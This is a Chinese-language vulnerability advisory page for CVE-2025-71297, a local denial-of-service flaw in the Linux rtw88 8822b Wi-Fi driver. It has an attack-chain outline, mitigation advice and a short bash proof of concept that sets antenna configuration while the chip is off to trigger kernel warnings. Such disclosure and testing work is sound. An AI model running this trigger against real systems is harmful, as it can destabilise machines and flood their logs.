IPBUF安全漏洞报告
English
CVE-2025-71297 CVSS 5.5 中危

CVE-2025-71297 Linux内核rtw88驱动拒绝服务漏洞

披露日期: 2026-05-08
来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号
CVE-2025-71297
漏洞类型
拒绝服务
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Linux Kernel (rtw88 driver)

相关标签

DoSLinux KernelRTW88DriverWirelessLocal

漏洞概述

Linux内核中的rtw88无线网卡驱动(针对8822b芯片型号)存在一处逻辑缺陷。该漏洞允许本地低权限用户在无线芯片处于断电状态时,通过用户空间工具触发天线配置函数。由于驱动未在操作前检查芯片电源状态,尝试读取RF寄存器会导致返回意外值,进而触发内核WARNING。此漏洞虽然不直接导致代码执行,但可能造成系统日志泛滥或触发内核自我保护机制,导致服务拒绝。

技术细节

该漏洞位于Linux内核的`drivers/net/wireless/realtek/rtw88/rtw8822b.c`文件中。核心问题在于`rtw8822b_set_antenna`函数调用了`rtw8822b_config_trx_mode`,而后者会执行硬件寄存器的写入与回读验证。当无线芯片处于关闭状态(例如硬件开关关闭或驱动处于低功耗模式)时,RF寄存器不可访问。此时若用户通过`nl80211`接口发送`set_antenna`请求,驱动程序仍尝试进行硬件配置,导致读取失败。内核检测到这种异常的硬件行为后,会抛出WARNING,这可能导致系统不稳定或资源耗尽。修复方案是在调用`rtw8822b_config_trx_mode`之前增加对芯片电源状态的检查,确保操作仅在芯片上电时执行。攻击者仅需拥有本地低权限即可利用此漏洞,通过简单的脚本或命令行工具即可复现。

攻击链分析

STEP 1
步骤1
攻击者获取本地低权限用户访问权限。
STEP 2
步骤2
确认目标系统使用带有rtw88_8822b驱动的Linux内核,且无线网卡处于关闭或低功耗状态。
STEP 3
步骤3
攻击者执行`iw`命令或调用netlink接口修改天线配置。
STEP 4
步骤4
驱动尝试访问断电状态下的RF寄存器,触发内核WARNING,导致系统不稳定或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # PoC for CVE-2025-71297 # Trigger kernel warning in rtw8822b by setting antenna when chip is off. # Replace 'phy0' with the actual wireless phy name if different PHY_NAME="phy0" echo "[+] Checking if wireless interface exists..." iw dev 2>&1 | grep -q phy || { echo "[-] No wireless interface found."; exit 1; } echo "[+] Attempting to trigger vulnerability..." # This command attempts to configure the antenna. # If the chip is powered off, it triggers the warning in rtw8822b_config_trx_mode. iw $PHY_NAME set antenna all 0 echo "[+] Checking dmesg for WARNING..." dmesg | tail -n 10 | grep -i "WARNING\|rtw8822b_config_trx_mode"

影响范围

Linux Kernel < commit 0d0c2fb80ca4c284c397dd7546743a3b5fdf4020
Linux Kernel < commit 44510ff07b5198e4a835a3074b716cec8357695b

防御指南

临时缓解措施
在未升级内核之前,可以通过限制普通用户对无线网卡的配置权限来减轻风险。确保无线网卡驱动程序仅在必要时加载,或者避免在网卡关闭时执行硬件配置操作。建议尽快关注发行版的安全更新并及时应用。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表